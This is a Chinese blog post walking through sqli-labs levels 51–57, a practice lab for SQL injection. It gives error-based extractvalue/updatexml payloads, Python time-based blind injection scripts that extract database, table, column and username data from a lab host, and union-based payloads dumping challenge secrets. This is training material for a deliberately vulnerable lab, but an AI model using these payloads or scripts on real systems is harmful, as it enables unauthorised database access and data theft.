sqli-labs(10)

已于 2023-12-04 10:45:25 修改
阅读量194 收藏
点赞数 5
分类专栏: 靶场 文章标签: sql 数据库 web安全 安全
于 2023-12-04 10:45:11 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61988806/article/details/134768523
版权

51.

'and extractvalue(1,concat(0x5c,database())) --+
'and updatexml(1,concat(0x7e,database(),0x7e),1) --+

'and extractvalue(1,concat(0x5c,(select group_concat(table_name) from information_schema.tables where table_schema='security'))) --+
'and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1) --+

'and extractvalue(1,concat(0x5c,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'))) --+
'and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1) --+

'and extractvalue(1,concat(0x5c,(select group_concat(username) from security.users))) --+
'and updatexml(1,concat(0x7e,(select group_concat(username) from security.users),0x7e),1) --+

52.

时间盲注

def database():
    database_name = ""
    charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
    while True:
        for char in charset:
            payload = f"1 and if(substr(database(),{len (database_name) + 1},1)='{char}',sleep(2),0) --+"
            url = f"http://192.168.1.200:86/Less-52?sort={payload}"

            start_time = time.time()
            rsp =requests.get(url)
            end_time = time.time()

            rsp_time = end_time - start_time

            if rsp_time >= 2:
                database_name += char
                print(f"数据库名称为:{database_name}")
                break
        else:
            break
    return database_name

datas = database()
print("最终数据库名称为:",datas)

def tablename():
    table_name = ""
    charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
    while True:
        for char in charset:
            payload = f"1 and if(substr((select table_name from information_schema.tables where table_schema='security' limit 3,1),{len(table_name) +1},1)='{char}',sleep(2),0) --+)"
            url = f"http://192.168.1.200:86/Less-52?sort={payload}"

            start_time = time.time()
            
            rsp =requests.get(url)
            end_time = time.time()

            rsp_time = end_time - start_time

            if rsp_time >= 2:
                table_name += char
                print(f"表名称为:{table_name}")
                break
        else: 
            break
    return table_name
tbales = tablename()
print("最终表名称为:",tbales)

def columnname():
    column_name = ""
    charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
    while True:
        for char in charset:
            payload = f"1 and if(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 2,1),{len(column_name ) +1},1)='{char}',sleep(2),0) --+)"
            url = f"http://192.168.1.200:86/Less-52?sort={payload}"

            start_time = time.time()
            rsp =requests.get(url)
            end_time = time.time()

            rsp_time = end_time - start_time

            if rsp_time >= 2:
                column_name += char
                print(f"列名称为:{column_name}")
                break
        else:
            break
    return column_name
columns = columnname()
print("最终列名称为:",columns)

最终脚本

def database():
    database_name = ""
    charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
    while True:
        for char in charset:
            payload = f"1 and if(substr(database(),{len (database_name) + 1},1)='{char}',sleep(2),0) --+"
            url = f"http://192.168.1.200:86/Less-52?sort={payload}"

            start_time = time.time()
            rsp =requests.get(url)
            end_time = time.time()

            rsp_time = end_time - start_time

            if rsp_time >= 2:
                database_name += char
                print(f"数据库名称为:{database_name}")
                break
        else:
            break
    return database_name

datas = database()
print("最终数据库名称为:",datas)



def tablename():
    table_name = ""
    charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
    while True:
        for char in charset:
            payload = f"1 and if(substr((select table_name from information_schema.tables where table_schema='security' limit 3,1),{len(table_name) +1},1)='{char}',sleep(2),0) --+)"
            url = f"http://192.168.1.200:86/Less-52?sort={payload}"

            start_time = time.time()
            
            rsp =requests.get(url)
            end_time = time.time()

            rsp_time = end_time - start_time

            if rsp_time >= 2:
                table_name += char
                print(f"表名称为:{table_name}")
                break
        else: 
            break
    return table_name
tbales = tablename()
print("最终表名称为:",tbales)

def columnname():
    column_name = ""
    charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
    while True:
        for char in charset:
            payload = f"1 and if(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 2,1),{len(column_name ) +1},1)='{char}',sleep(2),0) --+)"
            url = f"http://192.168.1.200:86/Less-52?sort={payload}"

            start_time = time.time()
            rsp =requests.get(url)
            end_time = time.time()

            rsp_time = end_time - start_time

            if rsp_time >= 2:
                column_name += char
                print(f"列名称为:{column_name}")
                break
        else:
            break
    return column_name
columns = columnname()
print("最终列名称为:",columns)


def data():
    data = ""
    charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
    while True:
        for char in charset:
            payload = f'1 and if(substr((select username from security.users limit 0,1),{len(data) +1},1)="{char}",sleep(2),0) --+'
            url = f"http://192.168.1.200:86/Less-52?sort={payload}"
            
            start_time = time.time()
            rsp =requests.get(url)
            end_time = time.time()
            
            rsp_time = end_time - start_time
            if rsp_time >= 2:
                data += char
                print(f"数据为:{data}")
                break   
        else:
            break
    return data
datas = data()
print("最终数据为:",datas)

53.

对比52多了‘直接给脚本

def database():
    database_name = ""
    charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
    while True:
        for char in charset:
            payload = f"1' and if(substr(database(),{len (database_name) + 1},1)='{char}',sleep(2),0) --+"
            url = f"http://192.168.1.200:86/Less-53?sort={payload}"

            start_time = time.time()
            rsp =requests.get(url)
            end_time = time.time()

            rsp_time = end_time - start_time

            if rsp_time >= 2:
                database_name += char
                print(f"数据库名称为:{database_name}")
                break
        else:
            break
    return database_name

datas = database()
print("最终数据库名称为:",datas)



def tablename():
    table_name = ""
    charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
    while True:
        for char in charset:
            payload = f"1' and if(substr((select table_name from information_schema.tables where table_schema='security' limit 3,1),{len(table_name) +1},1)='{char}',sleep(2),0) --+)"
            url = f"http://192.168.1.200:86/Less-53?sort={payload}"

            start_time = time.time()
            
            rsp =requests.get(url)
            end_time = time.time()

            rsp_time = end_time - start_time

            if rsp_time >= 2:
                table_name += char
                print(f"表名称为:{table_name}")
                break
        else: 
            break
    return table_name
tbales = tablename()
print("最终表名称为:",tbales)

def columnname():
    column_name = ""
    charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
    while True:
        for char in charset:
            payload = f"1' and if(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 2,1),{len(column_name ) +1},1)='{char}',sleep(2),0) --+)"
            url = f"http://192.168.1.200:86/Less-53?sort={payload}"

            start_time = time.time()
            rsp =requests.get(url)
            end_time = time.time()

            rsp_time = end_time - start_time

            if rsp_time >= 2:
                column_name += char
                print(f"列名称为:{column_name}")
                break
        else:
            break
    return column_name
columns = columnname()
print("最终列名称为:",columns)


def data():
    data = ""
    charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
    while True:
        for char in charset:
            payload = f"1' and if(substr((select username from security.users limit 0,1),{len(data) +1},1)='{char}',sleep(2),0) --+"
            url = f"http://192.168.1.200:86/Less-53?sort={payload}"
            
            start_time = time.time()
            rsp =requests.get(url)
            end_time = time.time()
            
            rsp_time = end_time - start_time
            if rsp_time >= 2:
                data += char
                print(f"数据为:{data}")
                break   
        else:
            break
    return data
datas = data()
print("最终数据为:",datas)

54.

通过1’

1” 

1‘ and 1=1 --+

1' and 1=0 --+

知道是字符型‘闭合

-1'union select 1,2,3 --+

-1'union select 1,database(),3 --+

-1'union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),3 --+

-1'union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='yu7uk3jq14'),3 --+

-1'union select 1,(select group_concat(secret_AHKQ) from challenges.yu7uk3jq14 ),3 --+

55.

通过尝试1 1‘ 1” 1) 然后and 1=1 1=0 得到是)

-1)union select 1,2,3 --+

-1)union select 1,database(),3 --+

-1)union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),3 --+

-1)union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='qagexyonus'),3 --+

-1)union select 1,(select secret_Q75I from challenges.qagexyonus),3 --+

56.

尝试 1 1’ 1“ 1) 1‘) 然后1=1 1=0 得到是’)

-1') union select 1,database(),3 --+

-1')union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),3 --+

-1') union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='l914uezg1n'),3 --+

-1')union select 1,(select secret_GKSK from challenges.l914uezg1n),3 --+

57.

通过尝试1 1‘ 1” 然后1=1 1=0  得到是“

-1"union select 1,database(),3 --+

-1"union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),3 --+

-1"union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='p5uh9b96gw'),3 --+

-1"union select 1,(select secret_4Y6J from challenges.p5uh9b96gw),3 --+

许允er
关注
  • 5
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
sqli-labs关卡10(基于get提交的双引号闭合的时间盲注)通关思路
zyh1588的博客
11-01 342
小白回顾sqli-labs靶场第十关
sqli-labs 1~10关教程
jiji_king的博客
04-04 5700
sqlli-labs 1~10关教程 第一关 输入?id=1 出现如下图 输入id=1’ 出现语法错误 表示这里可能出现sql注入漏洞 进一步尝试 输入 id=1’ --+ 发现回显正常 用order by 判断该语句有几列数据 ?id=1’ order by 3 --+ order by 3 回显正常 order by 4 显示错误 证明有三列数据 具体解释见: 于是使用 函数查询,此时要将id=1改为一个数据库不存在的数值 比如888,给后面查询语句留显示位。此时注入语句为: ?id=
sqli-labs 1-10(GET型注入)新手通关详解(高手误入)
b1n的博客
07-16 2943
1.第一关是单引号字符型注入2.用--+进行注释,页面正常显示。
sqli-labs第1-10
永远相信美好的事情即将发生
02-03 905
Less-1 进入Less-1关卡,提示输入id为一个数值 尝试提交id=1,回显login name 和password 尝试提交id=1’,回显报错,说明存在注入点,根据回显内容’1’’ LIMIT 0,1(外面一层单引号表示引用,把它去掉),可判断提交的数据类型为字符型,由此可猜测sql语句:select * from 某表 where id='某个值' limit 0,1 接下来利用order by判断表中有几列,提交?id=1' order by 3 --+回显正常,提交?id=1' ord
时间盲注脚本——以sqli-labs第十关为例
weixin_52450702的博客
12-14 512
时间盲注脚本
phpstudy+靶场sqli-labs-master下载
最新发布
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
sqli-labs.rar
12-22
sqli-labs是一个专门设计用于学习和练习SQL注入技术的平台,特别适合初学者了解和提升SQL注入防御技能。 首先,要搭建sqli-labs,你需要准备以下工具: 1. PHPstudy:一个集成的Web服务器环境,包括Apache、Nginx、...
安装sqli-labs
10-22
安装sqli-labs靶场环境 本文旨在指导读者安装sqli-labs靶场环境,用于学习和练习SQL注入漏洞。sqli-labs是一款功能强大且易于使用的靶场环境,包含多种最新的漏洞,可以满足不同级别的用户需求。 为什么要使用本地...
jeakinscheung-sqli-labs-php7-master.zip
03-16
标题 "jeakinscheung-sqli-labs-php7-master.zip" 暗示这是一个关于SQL注入(SQL Injection)练习平台的源代码库,专为PHP7优化。在描述中提到,用户在尝试创建数据库连接时遇到问题,可能是因为原始的SQL注入实验室...
sqli-labs(php7.3以上可运行)
01-29
sqli-labs提供了多种级别的SQL注入练习,适合初学者到高级安全专家。每个级别都设计了一个具有不同安全漏洞的Web应用,用户可以通过尝试注入SQL语句来解密问题,从而深入理解SQL注入的各种技术和防御策略。 三、PHP...
sqli-labs实验环境
05-08
`sqli-labs`是一个专门用于学习和实践SQL注入的实验环境,它提供了多种类型的SQL注入漏洞场景,包括但不限于盲注、时间延迟注入、宽字节注入、联合查询注入等。通过这些实验,初学者可以深入了解SQL注入的原理,掌握...
sqli-labs-php7-master.zip
04-06
SQL注入攻防演练平台——sqli-labs-php7-master》 在网络安全领域,CTF(Capture The Flag)比赛是一种常见的技术竞技形式,它旨在提升参赛者的网络安全技能,特别是对于Web安全的理解。在这个背景下,"sqli-labs...
sqli-labs 1-10通关教程
m0_51428325的博客
12-26 678
1.LOW <?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]; // Check database $query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; $result = mysqli_query($GLOBALS["___mysqli_ston"], $query
sqli-labs10
qq_55777983的博客
07-29 159
less-10 sqli-lab 10 在掌握了sqli-lab 9的基础上就更简单了 就是注入的时候闭合使用一个双引号 具体参考sqli-labs 9 将payload的’全改成双引号即可 我都有点不(tai)好(shuang)意(le)思(a)这么水了 ...
sqli-labs(10
jimggg的博客
03-19 112
参照第9题只需将单引号换成双引号,即id=1’换成id=1"
SQLi-LABS(1~10关详解)
CTF小白的博客
09-22 6455
目录SQLi-LABS Less-1查看题目环境测试注入点SQL注入查找列数查询数据库查询数据库中的表查表中的字段查数据SQLi-LABS Less-2查看题目环境测试注入点SQL注入查找列数查询数据库查询数据库中的表查表中的字段查数据SQLi-LABS Less-3查看题目环境测试注入点SQL注入查找列数查询数据库查询数据库中的表查表中的字段查数据SQLi-LABS Less-4查看题目环境测试...
MySQL注入实战指南——Sqli-labs教程解析
"MySQL注入天书——Sqli-labs使用手册" 这篇文档是关于MySQL注入技术的详细指南,特别关注于使用Sqli-labs进行实战练习。作者Lcamry在2016年编写了这份手册,旨在帮助读者理解和掌握SQL注入攻击与防御的相关知识。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

许允er

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值